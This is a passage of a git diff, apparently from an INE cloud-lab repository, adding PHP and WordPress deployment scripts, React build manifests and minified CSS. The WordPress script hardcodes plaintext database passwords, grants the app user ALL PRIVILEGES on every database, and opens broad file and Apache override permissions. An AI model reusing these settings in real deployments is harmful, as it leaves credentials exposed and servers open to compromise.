/var/www -type d -exec chmod 2775 {} \; +find /var/www -type f -exec chmod 0664 {} \; + +cp -r build/* /var/www/html/ +mkdir /var/www/html/bmi-calculator +mv /var/www/html/static /var/www/html/bmi-calculator +systemctl restart httpd.service diff --git a/modules/module-1/resources/storage_account/shared/scripts/php-deploy.sh b/modules/module-1/resources/storage_account/shared/scripts/php-deploy.sh new file mode 100644 index 0000000..02e60f7 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/scripts/php-deploy.sh @@ -0,0 +1,30 @@ +#!/bin/bash +yum update -y +yum install -y httpd php +systemctl start httpd +systemctl enable httpd +usermod -a -G apache ec2-user +chown -R ec2-user:apache /var/www +chmod 2775 /var/www +find /var/www -type d -exec chmod 2775 {} \; +find /var/www -type f -exec chmod 0664 {} \; +# PHP script to display Instance ID and Availability Zone +cat << 'EOF' > /var/www/html/index.php + + + +
+ +

EC2 Instance ID:

+

Availability Zone:

+
+ + +EOF \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/shared/scripts/wordpress_deploy.sh b/modules/module-1/resources/storage_account/shared/scripts/wordpress_deploy.sh new file mode 100644 index 0000000..d35c55b --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/scripts/wordpress_deploy.sh @@ -0,0 +1,87 @@ +#!/bin/bash + +sudo su + +db_root_password=PassWord4-root +db_username=wordpress_user +db_user_password=PassWord4-user +db_name=wordpress_db + + +yum update -y +yum install -y httpd + + +amazon-linux-extras enable php7.4 +yum clean metadata +yum install -y php php-{pear,cgi,common,curl,mbstring,gd,mysqlnd,gettext,bcmath,json,xml,fpm,intl,zip,imap,devel} + +yum -y install gcc ImageMagick ImageMagick-devel ImageMagick-perl +pecl install imagick +chmod 755 /usr/lib64/php/modules/imagick.so +cat <>/etc/php.d/20-imagick.ini + +extension=imagick + +EOF + +systemctl restart php-fpm.service + + +yum install -y https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm +yum localinstall -y https://dev.mysql.com/get/mysql57-community-release-el7-11.noarch.rpm +rpm --import https://repo.mysql.com/RPM-GPG-KEY-mysql-2022 +yum install -y mysql-community-server + + + +systemctl start httpd +systemctl start mysqld + + +usermod -a -G apache ec2-user +chown -R ec2-user:apache /var/www +find /var/www -type d -exec chmod 2775 {} \; +find /var/www -type f -exec chmod 0664 {} \; + + +wget https://wordpress.org/latest.tar.gz +tar -xzf latest.tar.gz +cp -r wordpress/* /var/www/html/ + + +chown ec2-user:apache /var/log/mysqld.log +temppassword=$(grep 'temporary password' /var/log/mysqld.log | grep -o ".\{12\}$") +chown mysql:mysql /var/log/mysqld.log + + +mysql -p$temppassword --connect-expired-password -e "SET PASSWORD FOR root@localhost = PASSWORD('$db_root_password');FLUSH PRIVILEGES;" +mysql -p'$db_root_password' -e "DELETE FROM mysql.user WHERE User='';" +mysql -p'$db_root_password' -e "DELETE FROM mysql.user WHERE User='root' AND Host NOT IN ('localhost', '127.0.0.1', '::1');" + +mysql -u root -p"$db_root_password" -e "GRANT ALL PRIVILEGES ON *.* TO '$db_username'@'localhost' IDENTIFIED BY '$db_user_password';FLUSH PRIVILEGES;" + + +mysql -u $db_username -p"$db_user_password" -e "CREATE DATABASE $db_name;" + +cd /var/www/html +cp wp-config-sample.php wp-config.php + +sed -i "s/database_name_here/$db_name/g" wp-config.php +sed -i "s/username_here/$db_username/g" wp-config.php +sed -i "s/password_here/$db_user_password/g" wp-config.php +cat <>/var/www/html/wp-config.php + +define( 'FS_METHOD', 'direct' ); +define('WP_MEMORY_LIMIT', '256M'); +EOF + + +chown -R ec2-user:apache /var/www/html +chmod -R 774 /var/www/html + +sed -i '//,/<\/Directory>/ s/AllowOverride None/AllowOverride all/' /etc/httpd/conf/httpd.conf + +systemctl enable httpd.service +systemctl enable mysqld.service +systemctl restart httpd.service \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/asset-manifest.json b/modules/module-1/resources/storage_account/webfiles/build/asset-manifest.json new file mode 100644 index 0000000..0be49ed --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/asset-manifest.json @@ -0,0 +1,25 @@ +{ + "files": { + "main.css": "/static/css/main.e8c9e839.css", + "main.js": "/static/js/main.adc6b28e.js", + "static/js/787.8c65ad62.chunk.js": "/static/js/787.8c65ad62.chunk.js", + "static/media/aws.jpg": "/static/media/aws.7f8d469729dd2de6cfb3.jpg", + "static/media/aws-wname.jpg": "/static/media/aws-wname.ca2376115332eb5057e8.jpg", + "static/media/full-logo.png": "/static/media/full-logo.d541d93800287b5e76bc.png", + "static/media/azure-logo.png": "/static/media/azure-logo.a6f0fa0f711f4db88a15.png", + "static/media/login.jpg": "/static/media/login.e21739546d37920dcfe5.jpg", + "static/media/AWScloudtitle.jpg": "/static/media/AWScloudtitle.98cddcd1f55ecb7dbf64.jpg", + "static/media/reset-password.jpg": "/static/media/reset-password.534bb9d0d1f845e91b10.jpg", + "static/media/no-posts-found.jpg": "/static/media/no-posts-found.a48ad7ab109b12f96751.jpg", + "static/media/register.jpg": "/static/media/register.4206b16c0ce018f0307d.jpg", + "static/media/logo-title.png": "/static/media/logo-title.75c7c407bd28884bbbf7.png", + "index.html": "/index.html", + "main.e8c9e839.css.map": "/static/css/main.e8c9e839.css.map", + "main.adc6b28e.js.map": "/static/js/main.adc6b28e.js.map", + "787.8c65ad62.chunk.js.map": "/static/js/787.8c65ad62.chunk.js.map" + }, + "entrypoints": [ + "static/css/main.e8c9e839.css", + "static/js/main.adc6b28e.js" + ] +} \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/favicon/ine.png b/modules/module-1/resources/storage_account/webfiles/build/favicon/ine.png new file mode 100644 index 0000000..6c9997f Binary files /dev/null and b/modules/module-1/resources/storage_account/webfiles/build/favicon/ine.png differ diff --git a/modules/module-1/resources/storage_account/webfiles/build/favicon/logo.png b/modules/module-1/resources/storage_account/webfiles/build/favicon/logo.png new file mode 100644 index 0000000..3a47dd5 Binary files /dev/null and b/modules/module-1/resources/storage_account/webfiles/build/favicon/logo.png differ diff --git a/modules/module-1/resources/storage_account/webfiles/build/index.html b/modules/module-1/resources/storage_account/webfiles/build/index.html new file mode 100644 index 0000000..b0020e9 --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/index.html @@ -0,0 +1 @@ +INE
\ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/manifest.json b/modules/module-1/resources/storage_account/webfiles/build/manifest.json new file mode 100644 index 0000000..99cdad1 --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/manifest.json @@ -0,0 +1,20 @@ +{ + "short_name": "Minimal App", + "name": "React Material Minimal UI Kit", + "icons": [ + { + "src": "favicon/ine.png", + "sizes": "192x192", + "type": "image/png" + }, + { + "src": "favicon/ine.png", + "sizes": "512x512", + "type": "image/png" + } + ], + "start_url": ".", + "display": "standalone", + "theme_color": "#000000", + "background_color": "#ffffff" +} diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/css/main.e8c9e839.css b/modules/module-1/resources/storage_account/webfiles/build/static/css/main.e8c9e839.css new file mode 100644 index 0000000..eaa3ff9 --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/css/main.e8c9e839.css @@ -0,0 +1,11 @@ +@import url(https://fonts.googleapis.com/css2?family=Inter:wght@100;200;300;400;500;600;700;800;900&display=swap);[data-simplebar]{align-content:flex-start;align-items:flex-start;flex-direction:column;flex-wrap:wrap;justify-content:flex-start;position:relative}.simplebar-wrapper{height:inherit;max-height:inherit;max-width:inherit;overflow:hidden;width:inherit}.simplebar-mask{direction:inherit;height:auto!important;overflow:hidden;width:auto!important;z-index:0}.simplebar-mask,.simplebar-offset{bottom:0;left:0;margin:0;padding:0;position:absolute;right:0;top:0}.simplebar-offset{-webkit-overflow-scrolling:touch;box-sizing:inherit!important;direction:inherit!important;resize:none!important}.simplebar-content-wrapper{-ms-overflow-style:none;box-sizing:border-box!important;direction:inherit;display:block;height:100%;max-height:100%;max-width:100%;position:relative;scrollbar-width:none;width:auto}.simplebar-content-wrapper::-webkit-scrollbar,.simplebar-hide-scrollbar::-webkit-scrollbar{height:0;width:0}.simplebar-content:after,.simplebar-content:before{content:" ";display:table}.simplebar-placeholder{max-height:100%;max-width:100%;pointer-events:none;width:100%}.simplebar-height-auto-observer-wrapper{box-sizing:inherit!important;flex-basis:0;flex-grow:inherit;flex-shrink:0;float:left;height:100%;margin:0;max-height:1px;max-width:1px;overflow:hidden;padding:0;pointer-events:none;position:relative;width:100%;z-index:-1}.simplebar-height-auto-observer{box-sizing:inherit;display:block;height:1000%;left:0;min-height:1px;min-width:1px;opacity:0;top:0;width:1000%;z-index:-1}.simplebar-height-auto-observer,.simplebar-track{overflow:hidden;pointer-events:none;position:absolute}.simplebar-track{bottom:0;right:0;z-index:1}[data-simplebar].simplebar-dragging .simplebar-content{pointer-events:none;-ms-user-select:none;user-select:none;-webkit-user-select:none}[data-simplebar].simplebar-dragging .simplebar-track{pointer-events:all}.simplebar-scrollbar{left:0;min-height:10px;position:absolute;right:0}.simplebar-scrollbar:before{background:#000;border-radius:7px;content:"";left:2px;opacity:0;position:absolute;right:2px;transition:opacity .2s linear}.simplebar-scrollbar.simplebar-visible:before{opacity:.5;transition:opacity 0s linear}.simplebar-track.simplebar-vertical{top:0;width:11px}.simplebar-track.simplebar-vertical .simplebar-scrollbar:before{bottom:2px;top:2px}.simplebar-track.simplebar-horizontal{height:11px;left:0}.simplebar-track.simplebar-horizontal .simplebar-scrollbar:before{height:100%;left:2px;right:2px}.simplebar-track.simplebar-horizontal .simplebar-scrollbar{height:7px;left:0;min-height:0;min-width:10px;right:auto;top:2px;width:auto}[data-simplebar-direction=rtl] .simplebar-track.simplebar-vertical{left:0;right:auto}.hs-dummy-scrollbar-size{direction:rtl;height:500px;opacity:0;overflow-x:scroll;overflow-y:hidden;position:fixed;visibility:hidden;width:500px}.simplebar-hide-scrollbar{-ms-overflow-style:none;left:0;overflow-y:scroll;position:fixed;scrollbar-width:none;visibility:hidden} + +/*! + * Quill Editor v1.3.7 + * https://quilljs.com/ + * Copyright (c) 2014, Jason Chen + * Copyright (c) 2013, salesforce.com + */.ql-container{box-sizing:border-box;font-family:Helvetica,Arial,sans-serif;font-size:13px;height:100%;margin:0;position:relative}.ql-container.ql-disabled .ql-tooltip{visibility:hidden}.ql-container.ql-disabled .ql-editor ul[data-checked]>li:before{pointer-events:none}.ql-clipboard{height:1px;left:-100000px;overflow-y:hidden;position:absolute;top:50%}.ql-clipboard p{margin:0;padding:0}.ql-editor{word-wrap:break-word;box-sizing:border-box;height:100%;line-height:1.42;outline:none;overflow-y:auto;padding:12px 15px;tab-size:4;-moz-tab-size:4;text-align:left;white-space:pre-wrap}.ql-editor>*{cursor:text}.ql-editor blockquote,.ql-editor h1,.ql-editor h2,.ql-editor h3,.ql-editor h4,.ql-editor h5,.ql-editor h6,.ql-editor ol,.ql-editor p,.ql-editor pre,.ql-editor ul{counter-reset:list-1 list-2 list-3 list-4 list-5 list-6 list-7 list-8 list-9;margin:0;padding:0}.ql-editor ol,.ql-editor ul{padding-left:1.5em}.ql-editor ol>li,.ql-editor ul>li{list-style-type:none}.ql-editor ul>li:before{content:"\2022"}.ql-editor ul[data-checked=false],.ql-editor ul[data-checked=true]{pointer-events:none}.ql-editor ul[data-checked=false]>li *,.ql-editor ul[data-checked=true]>li *{pointer-events:all}.ql-editor ul[data-checked=false]>li:before,.ql-editor ul[data-checked=true]>li:before{color:#777;cursor:pointer;pointer-events:all}.ql-editor ul[data-checked=true]>li:before{content:"\2611"}.ql-editor ul[data-checked=false]>li:before{content:"\2610"}.ql-editor li:before{display:inline-block;white-space:nowrap;width:1.2em}.ql-editor li:not(.ql-direction-rtl):before{margin-left:-1.5em;margin-right:.3em;text-align:right}.ql-editor li.ql-direction-rtl:before{margin-left:.3em;margin-right:-1.5em}.ql-editor ol li:not(.ql-direction-rtl),.ql-editor ul li:not(.ql-direction-rtl){padding-left:1.5em}.ql-editor ol li.ql-direction-rtl,.ql-editor ul li.ql-direction-rtl{padding-right:1.5em}.ql-editor ol li{counter-increment:list-0;counter-reset:list-1 list-2 list-3 list-4 list-5 list-6 list-7 list-8 list-9}.ql-editor ol li:before{content:counter(list-0,decimal) ". "}.ql-editor ol li.ql-indent-1{counter-increment:list-1}.ql-editor ol li.ql-indent-1:before{content:counter(list-1,lower-alpha) ". "}.ql-editor ol li.ql-indent-1{counter-reset:list-2 list-3 list-4 list-5 list-6 list-7 list-8 list-9}.ql-editor ol li.ql-indent-2{counter-increment:list-2}.ql-editor ol li.ql-indent-2:before{content:counter(list-2,lower-roman) ". "}.ql-editor ol li.ql-indent-2{counter-reset:list-3 list-4 list-5 list-6 list-7 list-8 list-9}.ql-editor ol li.ql-indent-3{counter-increment:list-3}.ql-editor ol li.ql-indent-3:before{content:counter(list-3,decimal) ". "}.ql-editor ol li.ql-indent-3{counter-reset:list-4 list-5 list-6 list-7 list-8 list-9}.ql-editor ol li.ql-indent-4{counter-increment:list-4}.ql-editor ol li.ql-indent-4:before{content:counter(list-4,lower-alpha) ". "}.ql-editor ol li.ql-indent-4{counter-reset:list-5 list-6 list-7 list-8 list-9}.ql-editor ol li.ql-indent-5{counter-increment:list-5}.ql-editor ol li.ql-indent-5:before{content:counter(list-5,lower-roman) ". "}.ql-editor ol li.ql-indent-5{counter-reset:list-6 list-7 list-8 list-9}.ql-editor ol li.ql-indent-6{counter-increment:list-6}.ql-editor ol li.ql-indent-6:before{content:counter(list-6,decimal) ". "}.ql-editor ol li.ql-indent-6{counter-reset:list-7 list-8 list-9}.ql-editor ol li.ql-indent-7{counter-increment:list-7}.ql-editor ol li.ql-indent-7:before{content:counter(list-7,lower-alpha) ". "}.ql-editor ol li.ql-indent-7{counter-reset:list-8 list-9}.ql-editor ol li.ql-indent-8{counter-increment:list-8}.ql-editor ol li.ql-indent-8:before{content:counter(list-8,lower-roman) ". "}.ql-editor ol li.ql-indent-8{counter-reset:list-9}.ql-editor ol li.ql-indent-9{counter-increment:list-9}.ql-editor ol li.ql-indent-9:before{content:counter(list-9,decimal) ". "}.ql-editor .ql-indent-1:not(.ql-direction-rtl){padding-left:3em}.ql-editor li.ql-indent-1:not(.ql-direction-rtl){padding-left:4.5em}.ql-editor .ql-indent-1.ql-direction-rtl.ql-align-right{padding-right:3em}.ql-editor li.ql-indent-1.ql-direction-rtl.ql-align-right{padding-right:4.5em}.ql-editor .ql-indent-2:not(.ql-direction-rtl){padding-left:6em}.ql-editor li.ql-indent-2:not(.ql-direction-rtl){padding-left:7.5em}.ql-editor .ql-indent-2.ql-direction-rtl.ql-align-right{padding-right:6em}.ql-editor li.ql-indent-2.ql-direction-rtl.ql-align-right{padding-right:7.5em}.ql-editor .ql-indent-3:not(.ql-direction-rtl){padding-left:9em}.ql-editor li.ql-indent-3:not(.ql-direction-rtl){padding-left:10.5em}.ql-editor .ql-indent-3.ql-direction-rtl.ql-align-right{padding-right:9em}.ql-editor li.ql-indent-3.ql-direction-rtl.ql-align-right{padding-right:10.5em}.ql-editor .ql-indent-4:not(.ql-direction-rtl){padding-left:12em}.ql-editor li.ql-indent-4:not(.ql-direction-rtl){padding-left:13.5em}.ql-editor .ql-indent-4.ql-direction-rtl.ql-align-right{padding-right:12em}.ql-editor li.ql-indent-4.ql-direction-rtl.ql-align-right{padding-right:13.5em}.ql-editor .ql-indent-5:not(.ql-direction-rtl){padding-left:15em}.ql-editor li.ql-indent-5:not(.ql-direction-rtl){padding-left:16.5em}.ql-editor .ql-indent-5.ql-direction-rtl.ql-align-right{padding-right:15em}.ql-editor li.ql-indent-5.ql-direction-rtl.ql-align-right{padding-right:16.5em}.ql-editor .ql-indent-6:not(.ql-direction-rtl){padding-left:18em}.ql-editor li.ql-indent-6:not(.ql-direction-rtl){padding-left:19.5em}.ql-editor .ql-indent-6.ql-direction-rtl.ql-align-right{padding-right:18em}.ql-editor li.ql-indent-6.ql-direction-rtl.ql-align-right{padding-right:19.5em}.ql-editor .ql-indent-7:not(.ql-direction-rtl){padding-left:21em}.ql-editor li.ql-indent-7:not(.ql-direction-rtl){padding-left:22.5em}.ql-editor .ql-indent-7.ql-direction-rtl.ql-align-right{padding-right:21em}.ql-editor li.ql-indent-7.ql-direction-rtl.ql-align-right{padding-right:22.5em}.ql-editor .ql-indent-8:not(.ql-direction-rtl){padding-left:24em}.ql-editor li.ql-indent-8:not(.ql-direction-rtl){padding-left:25.5em}.ql-editor .ql-indent-8.ql-direction-rtl.ql-align-right{padding-right:24em}.ql-editor li.ql-indent-8.ql-direction-rtl.ql-align-right{padding-right:25.5em}.ql-editor .ql-indent-9:not(.ql-direction-rtl){padding-left:27em}.ql-editor li.ql-indent-9:not(.ql-direction-rtl){padding-left:28.5em}.ql-editor .ql-indent-9.ql-direction-rtl.ql-align-right{padding-right:27em}.ql-editor li.ql-indent-9.ql-direction-rtl.ql-align-right{padding-right:28.5em}.ql-editor .ql-video{display:block;max-width:100%}.ql-editor .ql-video.ql-align-center{margin:0 auto}.ql-editor .ql-video.ql-align-right{margin:0 0 0 auto}.ql-editor .ql-bg-black{background-color:#000}.ql-editor .ql-bg-red{background-color:#e60000}.ql-editor .ql-bg-orange{background-color:#f90}.ql-editor .ql-bg-yellow{background-color:#ff0}.ql-editor .ql-bg-green{background-color:#008a00}.ql-editor .ql-bg-blue{background-color:#06c}.ql-editor .ql-bg-purple{background-color:#93f}.ql-editor .ql-color-white{color:#fff}.ql-editor .ql-color-red{color:#e60000}.ql-editor .ql-color-orange{color:#f90}.ql-editor .ql-color-yellow{color:#ff0}.ql-editor .ql-color-green{color:#008a00}.ql-editor .ql-color-blue{color:#06c}.ql-editor .ql-color-purple{color:#93f}.ql-editor .ql-font-serif{font-family:Georgia,Times New Roman,serif}.ql-editor .ql-font-monospace{font-family:Monaco,Courier New,monospace}.ql-editor .ql-size-small{font-size:.75em}.ql-editor .ql-size-large{font-size:1.5em}.ql-editor .ql-size-huge{font-size:2.5em}.ql-editor .ql-direction-rtl{direction:rtl;text-align:inherit}.ql-editor .ql-align-center{text-align:center}.ql-editor .ql-align-justify{text-align:justify}.ql-editor .ql-align-right{text-align:right}.ql-editor.ql-blank:before{color:rgba(0,0,0,.6);content:attr(data-placeholder);font-style:italic;left:15px;pointer-events:none;position:absolute;right:15px}.ql-snow .ql-toolbar:after,.ql-snow.ql-toolbar:after{clear:both;content:"";display:table}.ql-snow .ql-toolbar button,.ql-snow.ql-toolbar button{background:none;border:none;cursor:pointer;display:inline-block;float:left;height:24px;padding:3px 5px;width:28px}.ql-snow .ql-toolbar button svg,.ql-snow.ql-toolbar button svg{float:left;height:100%}.ql-snow .ql-toolbar button:active:hover,.ql-snow.ql-toolbar button:active:hover{outline:none}.ql-snow .ql-toolbar input.ql-image[type=file],.ql-snow.ql-toolbar input.ql-image[type=file]{display:none}.ql-snow .ql-toolbar .ql-picker-item.ql-selected,.ql-snow .ql-toolbar .ql-picker-item:hover,.ql-snow .ql-toolbar .ql-picker-label.ql-active,.ql-snow .ql-toolbar .ql-picker-label:hover,.ql-snow .ql-toolbar button.ql-active,.ql-snow .ql-toolbar button:focus,.ql-snow .ql-toolbar button:hover,.ql-snow.ql-toolbar .ql-picker-item.ql-selected,.ql-snow.ql-toolbar .ql-picker-item:hover,.ql-snow.ql-toolbar .ql-picker-label.ql-active,.ql-snow.ql-toolbar .ql-picker-label:hover,.ql-snow.ql-toolbar button.ql-active,.ql-snow.ql-toolbar button:focus,.ql-snow.ql-toolbar button:hover{color:#06c}.ql-snow .ql-toolbar .ql-picker-item.ql-selected .ql-fill,.ql-snow .ql-toolbar .ql-picker-item.ql-selected .ql-stroke.ql-fill,.ql-snow .ql-toolbar .ql-picker-item:hover .ql-fill,.ql-snow .ql-toolbar .ql-picker-item:hover .ql-stroke.ql-fill,.ql-snow .ql-toolbar .ql-picker-label.ql-active .ql-fill,.ql-snow .ql-toolbar .ql-picker-label.ql-active .ql-stroke.ql-fill,.ql-snow .ql-toolbar .ql-picker-label:hover .ql-fill,.ql-snow .ql-toolbar .ql-picker-label:hover .ql-stroke.ql-fill,.ql-snow .ql-toolbar button.ql-active .ql-fill,.ql-snow .ql-toolbar button.ql-active .ql-stroke.ql-fill,.ql-snow .ql-toolbar button:focus .ql-fill,.ql-snow .ql-toolbar button:focus .ql-stroke.ql-fill,.ql-snow .ql-toolbar button:hover .ql-fill,.ql-snow .ql-toolbar button:hover .ql-stroke.ql-fill,.ql-snow.ql-toolbar .ql-picker-item.ql-selected .ql-fill,.ql-snow.ql-toolbar .ql-picker-item.ql-selected .ql-stroke.ql-fill,.ql-snow.ql-toolbar .ql-picker-item:hover .ql-fill,.ql-snow.ql-toolbar .ql-picker-item:hover .ql-stroke.ql-fill,.ql-snow.ql-toolbar .ql-picker-label.ql-active .ql-fill,.ql-snow.ql-toolbar .ql-picker-label.ql-active .ql-stroke.ql-fill,.ql-snow.ql-toolbar .ql-picker-label:hover .ql-fill,.ql-snow.ql-toolbar .ql-picker-label:hover .ql-stroke.ql-fill,.ql-snow.ql-toolbar button.ql-active .ql-fill,.ql-snow.ql-toolbar button.ql-active .ql-stroke.ql-fill,.ql-snow.ql-toolbar button:focus .ql-fill,.ql-snow.ql-toolbar button:focus .ql-stroke.ql-fill,.ql-snow.ql-toolbar button:hover .ql-fill,.ql-snow.ql-toolbar button:hover .ql-stroke.ql-fill{fill:#06c}.ql-snow .ql-toolbar .ql-picker-item.ql-selected .ql-stroke,.ql-snow .ql-toolbar .ql-picker-item.ql-selected .ql-stroke-miter,.ql-snow .ql-toolbar .ql-picker-item:hover .ql-stroke,.ql-snow .ql-toolbar .ql-picker-item:hover .ql-stroke-miter,.ql-snow .ql-toolbar .ql-picker-label.ql-active .ql-stroke,.ql-snow .ql-toolbar .ql-picker-label.ql-active .ql-stroke-miter,.ql-snow .ql-toolbar .ql-picker-label:hover .ql-stroke,.ql-snow .ql-toolbar .ql-picker-label:hover .ql-stroke-miter,.ql-snow .ql-toolbar button.ql-active .ql-stroke,.ql-snow .ql-toolbar button.ql-active .ql-stroke-miter,.ql-snow .ql-toolbar button:focus .ql-stroke,.ql-snow .ql-toolbar button:focus .ql-stroke-miter,.ql-snow .ql-toolbar button:hover .ql-stroke,.ql-snow .ql-toolbar button:hover .ql-stroke-miter,.ql-snow.ql-toolbar .ql-picker-item.ql-selected .ql-stroke,.ql-snow.ql-toolbar .ql-picker-item.ql-selected .ql-stroke-miter,.ql-snow.ql-toolbar .ql-picker-item:hover .ql-stroke,.ql-snow.ql-toolbar .ql-picker-item:hover .ql-stroke-miter,.ql-snow.ql-toolbar .ql-picker-label.ql-active .ql-stroke,.ql-snow.ql-toolbar .ql-picker-label.ql-active .ql-stroke-miter,.ql-snow.ql-toolbar .ql-picker-label:hover .ql-stroke,.ql-snow.ql-toolbar .ql-picker-label:hover .ql-stroke-miter,.ql-snow.ql-toolbar button.ql-active .ql-stroke,.ql-snow.ql-toolbar button.ql-active .ql-stroke-miter,.ql-snow.ql-toolbar button:focus .ql-stroke,.ql-snow.ql-toolbar button:focus .ql-stroke-miter,.ql-snow.ql-toolbar button:hover .ql-stroke,.ql-snow.ql-toolbar button:hover .ql-stroke-miter{stroke:#06c}@media (pointer:coarse){.ql-snow .ql-toolbar button:hover:not(.ql-active),.ql-snow.ql-toolbar button:hover:not(.ql-active){color:#444}.ql-snow .ql-toolbar button:hover:not(.ql-active) .ql-fill,.ql-snow .ql-toolbar button:hover:not(.ql-active) .ql-stroke.ql-fill,.ql-snow.ql-toolbar button:hover:not(.ql-active) .ql-fill,.ql-snow.ql-toolbar button:hover:not(.ql-active) .ql-stroke.ql-fill{fill:#444}.ql-snow .ql-toolbar button:hover:not(.ql-active) .ql-stroke,.ql-snow .ql-toolbar button:hover:not(.ql-active) .ql-stroke-miter,.ql-snow.ql-toolbar button:hover:not(.ql-active) .ql-stroke,.ql-snow.ql-toolbar button:hover:not(.ql-active) .ql-stroke-miter{stroke:#444}}.ql-snow,.ql-snow *{box-sizing:border-box}.ql-snow .ql-hidden{display:none}.ql-snow .ql-out-bottom,.ql-snow .ql-out-top{visibility:hidden}.ql-snow .ql-tooltip{position:absolute;-webkit-transform:translateY(10px);transform:translateY(10px)}.ql-snow .ql-tooltip a{cursor:pointer;text-decoration:none}.ql-snow .ql-tooltip.ql-flip{-webkit-transform:translateY(-10px);transform:translateY(-10px)}.ql-snow .ql-formats{display:inline-block;vertical-align:middle}.ql-snow .ql-formats:after{clear:both;content:"";display:table}.ql-snow .ql-stroke{fill:none;stroke:#444;stroke-linecap:round;stroke-linejoin:round;stroke-width:2}.ql-snow .ql-stroke-miter{fill:none;stroke:#444;stroke-miterlimit:10;stroke-width:2}.ql-snow .ql-fill,.ql-snow .ql-stroke.ql-fill{fill:#444}.ql-snow .ql-empty{fill:none}.ql-snow .ql-even{fill-rule:evenodd}.ql-snow .ql-stroke.ql-thin,.ql-snow .ql-thin{stroke-width:1}.ql-snow .ql-transparent{opacity:.4}.ql-snow .ql-direction svg:last-child{display:none}.ql-snow .ql-direction.ql-active svg:last-child{display:inline}.ql-snow .ql-direction.ql-active svg:first-child{display:none}.ql-snow .ql-editor h1{font-size:2em}.ql-snow .ql-editor h2{font-size:1.5em}.ql-snow .ql-editor h3{font-size:1.17em}.ql-snow .ql-editor h4{font-size:1em}.ql-snow .ql-editor h5{font-size:.83em}.ql-snow .ql-editor h6{font-size:.67em}.ql-snow .ql-editor a{text-decoration:underline}.ql-snow .ql-editor blockquote{border-left:4px solid #ccc;margin-bottom:5px;margin-top:5px;padding-left:16px}.ql-snow .ql-editor code,.ql-snow .ql-editor pre{background-color:#f0f0f0;border-radius:3px}.ql-snow .ql-editor pre{margin-bottom:5px;margin-top:5px;padding:5px 10px;white-space:pre-wrap}.ql-snow .ql-editor code{font-size:85%;padding:2px 4px}.ql-snow .ql-editor pre.ql-syntax{background-color:#23241f;color:#f8f8f2;overflow:visible}.ql-snow .ql-editor img{max-width:100%}.ql-snow .ql-picker{color:#444;display:inline-block;float:left;font-size:14px;font-weight:500;height:24px;position:relative;vertical-align:middle}.ql-snow .ql-picker-label{cursor:pointer;display:inline-block;height:100%;padding-left:8px;padding-right:2px;position:relative;width:100%}.ql-snow .ql-picker-label:before{display:inline-block;line-height:22px}.ql-snow .ql-picker-options{background-color:#fff;display:none;min-width:100%;padding:4px 8px;position:absolute;white-space:nowrap}.ql-snow .ql-picker-options .ql-picker-item{cursor:pointer;display:block;padding-bottom:5px;padding-top:5px}.ql-snow .ql-picker.ql-expanded .ql-picker-label{color:#ccc;z-index:2}.ql-snow .ql-picker.ql-expanded .ql-picker-label .ql-fill{fill:#ccc}.ql-snow .ql-picker.ql-expanded .ql-picker-label .ql-stroke{stroke:#ccc}.ql-snow .ql-picker.ql-expanded .ql-picker-options{display:block;margin-top:-1px;top:100%;z-index:1}.ql-snow .ql-color-picker,.ql-snow .ql-icon-picker{width:28px}.ql-snow .ql-color-picker .ql-picker-label,.ql-snow .ql-icon-picker .ql-picker-label{padding:2px 4px}.ql-snow .ql-color-picker .ql-picker-label svg,.ql-snow .ql-icon-picker .ql-picker-label svg{right:4px}.ql-snow .ql-icon-picker .ql-picker-options{padding:4px 0}.ql-snow .ql-icon-picker .ql-picker-item{height:24px;padding:2px 4px;width:24px}.ql-snow .ql-color-picker .ql-picker-options{padding:3px 5px;width:152px}.ql-snow .ql-color-picker .ql-picker-item{border:1px solid transparent;float:left;height:16px;margin:2px;padding:0;width:16px}.ql-snow .ql-picker:not(.ql-color-picker):not(.ql-icon-picker) svg{margin-top:-9px;position:absolute;right:0;top:50%;width:18px}.ql-snow .ql-picker.ql-font .ql-picker-item[data-label]:not([data-label=""]):before,.ql-snow .ql-picker.ql-font .ql-picker-label[data-label]:not([data-label=""]):before,.ql-snow .ql-picker.ql-header .ql-picker-item[data-label]:not([data-label=""]):before,.ql-snow .ql-picker.ql-header .ql-picker-label[data-label]:not([data-label=""]):before,.ql-snow .ql-picker.ql-size .ql-picker-item[data-label]:not([data-label=""]):before,.ql-snow .ql-picker.ql-size .ql-picker-label[data-label]:not([data-label=""]):before{content:attr(data-label)}.ql-snow .ql-picker.ql-header{width:98px}.ql-snow .ql-picker.ql-header .ql-picker-item:before,.ql-snow .ql-picker.ql-header .ql-picker-label:before{content:"Normal"}.ql-snow .ql-picker.ql-header .ql-picker-item[data-value="1"]:before,.ql-snow .ql-picker.ql-header .ql-picker-label[data-value="1"]:before{content:"Heading 1"}.ql-snow .ql-picker.ql-header .ql-picker-item[data-value="2"]:before,.ql-snow .ql-picker.ql-header .ql-picker-label[data-value="2"]:before{content:"Heading 2"}.ql-snow .ql-picker.ql-header .ql-picker-item[data-value="3"]:before,.ql-snow .ql-picker.ql-header .ql-picker-label[data-value="3"]:before{content:"Heading 3"}.ql-snow .ql-picker.ql-header .ql-picker-item[data-value="4"]:before,.ql-snow .ql-picker.ql-header .ql-picker-label[data-value="4"]:before{content:"Heading 4"}.ql-snow .ql-picker.ql-header .ql-picker-item[data-value="5"]:before,.ql-snow .ql-picker.ql-header .ql-picker-label[data-value="5"]:before{content:"Heading 5"}.ql-snow .ql-picker.ql-header .ql-picker-item[data-value="6"]:before,.ql-snow .ql-picker.ql-header .ql-picker-label[data-value="6"]:before{content:"Heading 6"}.ql-snow .ql-picker.ql-header .ql-picker-item[data-value="1"]:before{font-size:2em}.ql-snow .ql-picker.ql-header .ql-picker-item[data-value="2"]:before{font-size:1.5em}.ql-snow .ql-picker.ql-header .ql-picker-item[data-value="3"]:before{font-size:1.17em}.ql-snow .ql-picker.ql-header .ql-picker-item[data-value="4"]:before{font-size:1em}.ql-snow .ql-picker.ql-header 